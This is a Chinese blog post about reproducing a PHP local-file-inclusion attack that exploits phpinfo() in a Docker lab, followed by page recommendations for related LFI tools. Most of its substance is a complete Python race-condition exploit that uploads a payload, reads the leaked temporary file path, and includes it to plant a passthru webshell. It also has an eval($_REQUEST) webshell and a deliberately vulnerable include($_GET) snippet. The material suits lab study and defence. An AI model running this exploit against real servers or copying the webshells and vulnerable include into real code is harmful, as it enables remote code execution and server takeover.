[LFI]Phpinfo本地文件包含漏洞环境搭建分析

最新推荐文章于 2024-03-05 15:51:03 发布
最新推荐文章于 2024-03-05 15:51:03 发布
阅读量4.4k 收藏
点赞数
分类专栏: 渗透测试 文章标签: python 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21604717/article/details/52357778
版权

0x00

本地文件包含漏洞即网站未对用户可控变量进行控制,导致用户可以控制包含变量。

0x01

参考wooyun上的教程中遇到问题如下:

Can not  connect to the docker deamon

权限不够,docker未提示,指令前加sudo

sudo docker run –rm -p “8901:80” janes/lfi_phpinfo

LP}B[0@MX3)}%YQV@N%_$LB

8901为本机端口,80为容器端口,即将容器80端口映射至本机8901端口

janes/lfi_phpinfo为容器仓库名

本机80端口占用问题一直未解决,明明kill了所有80端口进程

最后还是未能成功取得shell.还是因为本机端口与代码默认端口不同,利用指定端口指令,以代码出错告终。

0x03

upload.html

<!doctype html>
<html>
<body>
    <form action="phpinfo.php" method="POST" enctype="multipart/form-data">
    <h3> Test upload tmp file</h3>
    <label for="file">Filename:</label>
    <input type="file" name="file"/><br/>
    <input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

file.txt


<?php
eval($_REQUEST["cmd"]);
?>

教程中将file.txt上传至upload.html中,再利用phpinfo泄露的临时文件路径


temp文件命名规则为:php+a-zA-Z0-9

temp文件一般在我们反应过来之前就自己删除了。

因此我们需要借助一些手段来延长他的消失时间,就是时间竞争

0x04

一种post大量数据,数据会分块传输,加长传输时间

#!/usr/bin/env pyhon
# -*-coding: utf-8 -*-

"""
php 处理脚本执行完后再删除临时文件,间隔时间极短
"""

import sys
import threading
import socket
import logging
from argparse import ArgumentParser

logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def setup(host, port):

    tag = "Security Test"
    boundary = '---------------------------11008921013555437861019615112'#分隔符
    #

    # php_path maybe '/lfi_phpinfo' or ''
    php_path = ''

    payload = "{tag}\r\n".format(tag=tag)
    payload += '<?php $c=fopen("/tmp/gc", "w");fwrite($c, \'<?php passthru($_GET["f"]);?>\');?>'

    req_data = '--{b}\r\n'.format(b=boundary)
    req_data += 'Content-Disposition: form-data; name="file"; filename="file.txt"\r\n'
    req_data += 'Content-Type: text/plain\r\n'
    req_data += '\r\n'
    req_data += '{payload}\r\n'.format(payload=payload)
    req_data += '--{b}--'.format(b=boundary)

    # padding for delay php server delete tmp file
    # 这种方式是phpinfo返回发送的头信息,信息过大的话就采用分块传输,padding增加了传输时间,根据需要改
    padding = 'A' * 8000

    req = 'POST {path}/phpinfo.php?a={padding} HTTP/1.1\r\n'.format(path=php_path, padding=padding)
    req += 'Host: {host}\r\n'.format(host=host)
    req += 'Cookie: othercookie={padding}\r\n'.format(padding=padding)
    req += 'User-Agent: {padding}\r\n'.format(padding=padding)
    #req += 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
    req += 'Accept: {padding}\r\n'.format(padding=padding)
    req += 'Accept-Language: {padding}\r\n'.format(padding=padding)
    req += 'Accept-Encoding: {padding}\r\n'.format(padding=padding)
    req += 'Content-Type: multipart/form-data; boundary={b}\r\n'.format(b=boundary)
    req += 'Content-Length: {l}\r\n'.format(l=len(req_data))
    req += 'Connection: close\r\n'
    req += '\r\n'
    req += '{data}'.format(data=req_data)

    # modify this to suit the LFI script
    lfi_req = 'GET {path}/lfi.php?load=%s HTTP/1.1\r\n'.format(path=php_path)
    lfi_req += 'Connection: Keep-alive\r\n'
    lfi_req += 'Host: %s\r\n'
    lfi_req += '\r\n'

    return (req, tag, lfi_req)



def lfi_phpinfo(host, port, phpinfo_req, offset, lfi_req, tag):
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s1.connect((host, port))
    s2.connect((host, port))

    s1.sendall(phpinfo_req)
    data = ""
    while len(data) < offset:
        data += s1.recv(offset)

    try:
        index = data.index("[tmp_name] =>")
        fn = data[index+17: index+31]
    except ValueError as e:
        err_msg = "fetch temp file path error: {e}".format(e=e)
        log.error(err_msg)
        return None

    s2.sendall(lfi_req % (fn, host))

    data = s2.recv(4096)

    # debug
    log.debug(data)

    s1.close()
    s2.close()

    if data.find(tag) != -1:
        return fn


counter = 0


class ThreadWorker(threading.Thread):

    def __init__(self, event, lock, maxattempts, *args):
        threading.Thread.__init__(self)
        self.event = event
        self.lock = lock
        self.maxattempts = maxattempts
        self.args = args

    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter += 1

            try:
                x = lfi_phpinfo(*self.args)
                if self.event.is_set():
                    break
                if x:
                    info_msg = "\nGot it! Shell created in /tmp/g"
                    log.info(info_msg)
                    self.event.set()
            except socket.error:
                return


def getoffset(host, port, phpinfo_req):
    """Gets offset of tmp_name in php output
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(phpinfo_req)

    data = ""
    while True:
        rcv_data = s.recv(4096)

        data += rcv_data
        if rcv_data == "":
            break

        # detect the final chunk
        if rcv_data.endswith("0\r\n\r\n"):
            break

    s.close()

    # debug
    #log.debug(data)

    index = data.find("[tmp_name] =>")
    if index == -1:
        raise ValueError("No php tmp_name in phpinfo output")

    info_msg = "found {file} at {index}".format(file=data[index:index+10], index=index)
    log.info(info_msg)

    # padded up a bit
    return index+256


def main():

    banner = "LFI with phpinfo()\n"
    banner += "=" * 30
    print(banner)

    usage = "python {prog} host [port] [threads]. -h for help".format(prog=sys.argv[0])

    parser = ArgumentParser(usage=usage)
    parser.add_argument('host', help="ip or domain, e.g. 127.0.0.1")
    parser.add_argument('-p', dest='port', type=int, default=80,
            help="port, default is 80")
    parser.add_argument('-t', dest='threads', type=int, default=10,
            help="use n threads to access, default is 10")
    args = parser.parse_args()

    host = args.host
    port = args.port
    poolsz = args.threads

    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error as e:
        err_msg = "Error with hostname {h}:{err}".format(h=sys.argv[1], err=e)
        log.error(err_msg)
        sys.exit(1)

    info_msg = "Getting initial offset ..."
    log.info(info_msg)

    req, tag, lfi_req = setup(host, port)

    #debug_msg = '\n\n'.join([req, tag, lfi_req])
    #log.debug(debug_msg)

    offset = getoffset(host, port, req)

    sys.stdout.flush()

    maxattempts = 500
    event = threading.Event()
    lock = threading.Lock()

    tp = []

    for i in range(poolsz):
        tp.append(ThreadWorker(event, lock, maxattempts, host, port, req, offset, lfi_req, tag))

    for t in tp:
        t.start()

    try:
        while not event.wait(0.5):
            if event.is_set():
                break
            with lock:
                sys.stdout.write("\r\n% 4d / % 4d\n" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break

        if event.is_set():
            info_msg = "Wowo! \m/"
        else:
            info_msg = ":("
        log.info(info_msg)

    except KeyboardInterrupt:
        info_msg = "\nTelling threads to shutdown..."
        log.info(info_msg)
        event.set()

    info_msg = "Shutting down..."
    log.info(info_msg)

    for t in tp:
        t.join()

if __name__ == "__main__":
    main()

代码太长了,看不懂,不开森=-=

另一种方式即利用循环包含,层层嵌套,形成一个死循环,使temp文件一直存在

SIGSEGV:一种异常停止信号

<FORM ENCTYPE="multipart/form-data"ACTION="http://127.0.0.1/upload.php?c=upload.php" METHOD=POST>

File to process: <INPUT NAME="userfile1"TYPE="file">

<INPUT TYPE="submit" VALUE="Send File">

</FORM>

<?php

$a=$_GET['c'];

include $a;

?>

然后利用phpinfo泄露路径或者爆破文件名

0x05参考文献

http://drops.wooyun.org/web/13249

http://mp.weixin.qq.com/s?__biz=MzA4NzM0ODk0Nw==&mid=2649577458&idx=1&sn=485509d5fd3e0dcac1fb52543ffea46d&scene=0#wechat_redirect




听风吟雨落
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
toxin:LFI(本地文件包含漏洞利用工具
05-30
Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些...
利用phpinfo信息LFI临时文件[附POC]
Coisini的博客
06-18 987
还记得之前国外某牛提出的LFI包含临时文件么? 当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以 利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配 成,而且临时文件保存的路径也只能靠猜。 我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临...
文件包含中过滤了php,文件包含漏洞---php协议
weixin_32480335的博客
03-21 668
一、原理1、概念:在php代码中,总会有一些代码我们会经常用到,这时引入了文件包含函数,可以通过文件包含函数把这些代码文件包含进来,直接使用文件中的代码,这样提高了我们的工作效率。2、文件包含函数:include():如果发生错误,会产生一个警告然后继续执行脚本include_once():与include()相同,如果文件之前被包含过则不再包含require():会停止执行代码require_o...
PHPInfo()信息泄漏原理以及修复方法
最新发布
it知识分享 free for nothing..
03-05 737
PHPInfo()信息泄漏原理以及修复方法
phpinfo包含临时文件Getshell全过程及源码
记录学习,一起进步
03-04 2097
phpinfo包含临时文件Getshell全过程及源码
vulhub PHP文件包含漏洞(利用phpinfo)复现
weixin_53696027的博客
03-04 720
通过docker搭建vulhub靶场来利用php文件包含漏洞
lfi phpinfo
weixin_30878361的博客
09-29 896
利用条件 存在lfi漏洞 存在可访问phpinfo网页 利用原理 php会把post请求, 存储在临时文件中, 并在请求结束后删除临时文件 phpinfo中会显示_FILE变量, 其中会显示临时文件路径 所以可以通过发送数据量大的请求, 拖延php删除临时文件的时间, 同时查看_FILE得到临时文件位置, 并使用lfi漏洞对其进行包含从而执行 利用步骤 发送post请求到ph...
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
LFI本地包含漏洞介绍php
03-24
LFI本地包含漏洞介绍php的 这个是最新的2011年最新公布的。
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
用于枚举并尝试从LFI漏洞获取代码执行的python脚本 用法:lfi-fuzz.py [选项] 选项:-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE...
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
解释:LFI是能够打开并包含本地文件的漏洞; 这里区别一下RFI,远程文件包含突破; 实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并...
lfipwn:LFI扫描,漏洞利用工具
07-12
飞艇 LFI扫描,漏洞利用工具
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器...
lfi-helper:快速而肮脏的 python 脚本,可帮助通过 LFI 自动提取文件
07-07
lfi助手 快速而肮脏的 python 脚本,可帮助通过 LFI 自动提取文件 示例用法 请输入您要开始的基本网址: 文件路径~> windows\win.ini 内容长度:92 将文件保存到 windows-win.ini 文件路径~>
Vailyn:Python中的分阶段规避路径遍历+ LFI扫描和利用工具
04-14
使用--lfi将它们包括在扫描中。关于Vailyn是用于路径遍历/目录爬网漏洞的多阶段漏洞分析和利用工具。 它的建立是为了使其性能尽可能好,并提供广泛的过滤器规避技术。它是如何工作的? Vailyn分两个阶段运行。 首先...
LFI.rar_LFI_sick_激光_激光 Visual
09-23
一个开源的激光显示项目,其中包括了测试的简单用例
已知某网站存在lfi(本地文件包含),但是无法上传任何文件,针对该情况有哪些利用方
09-21
已知某网站存在本地文件包含漏洞LFI),但无法上传任何文件,那么仍然可以利用以下方式进行攻击: 1. 获取敏感信息:利用LFI漏洞可以读取目标服务器上的本地文件,可以尝试获取敏感信息,如密码文件、配置文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值